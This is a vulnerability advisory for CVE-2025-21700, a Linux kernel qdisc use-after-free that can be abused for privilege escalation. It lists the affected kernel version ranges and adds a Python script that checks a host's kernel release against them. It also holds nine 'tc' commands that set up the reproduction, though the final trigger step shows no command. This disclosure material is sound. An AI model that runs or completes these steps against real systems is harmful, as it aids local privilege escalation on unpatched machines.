CVE-2025-21700

Severity CVSS v4.0: Pending analysis
Type: CWE-416 Use After Free
Publication date: 13/02/2025
Last modified: 24/03/2025

Description

In the Linux kernel, the following vulnerability has been resolved:

net: sched: Disallow replacing of child qdisc from one parent to another

Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation to demonstrate uaf
tc class add dev lo classid 1:1 drr

step3. a class for nesting
tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

step5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.
tc class add dev lo classid 3:1 drr

step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo
class drr 1:1 root leaf 2: quantum 64Kb
class drr 1:2 root leaf 3: quantum 64Kb
class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
qdisc drr 1: dev lo root refcnt 2
qdisc plug 2: dev lo parent 1:1
qdisc pfifo 4: dev lo parent 3:1 limit 1000p
qdisc drr 3: dev lo parent 1:2

step10. trigger the bug

Vulnerable products and versions

CPE                                             From                 Up to
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    2.6.12 (including)   5.4.291 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    5.5 (including)      5.10.235 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    5.11 (including)     5.15.179 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    5.16 (including)     6.1.129 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    6.2 (including)      6.6.76 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    6.7 (including)      6.12.13 (excluding)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*    6.13 (including)     6.13.2 (excluding)
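
A host's kernel release can be checked against the ranges in the table above. The following is an added example, not part of the original advisory; the function names are chosen here for illustration. It compares upstream version numbers only, so a distribution kernel that carries a backported fix can still match and should be confirmed against the vendor's advisory.

```python
import platform
import re

# Upstream ranges copied from the table above: (from, inclusive), (up to, exclusive).
VULNERABLE_RANGES = [
    ("2.6.12", "5.4.291"),
    ("5.5", "5.10.235"),
    ("5.11", "5.15.179"),
    ("5.16", "6.1.129"),
    ("6.2", "6.6.76"),
    ("6.7", "6.12.13"),
    ("6.13", "6.13.2"),
]


def parse_release(release):
    """Turn '5.15.0-91-generic' or '6.13' into a comparable tuple such as (5, 15, 0).

    Only the leading major.minor[.patch] is used; distro suffixes are ignored.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(part or 0) for part in m.groups())


def matching_range(release):
    """Return the (from, up_to) range that contains `release`, or None."""
    version = parse_release(release)
    for low, high in VULNERABLE_RANGES:
        if parse_release(low) <= version < parse_release(high):
            return (low, high)
    return None


if __name__ == "__main__":
    running = platform.release()  # same string as `uname -r` on Linux
    hit = matching_range(running)
    if hit:
        print(f"{running}: inside affected upstream range {hit[0]} <= v < {hit[1]}")
        print("Check the distribution's advisory for a backported fix.")
    else:
        print(f"{running}: outside the affected upstream ranges listed for CVE-2025-21700")
```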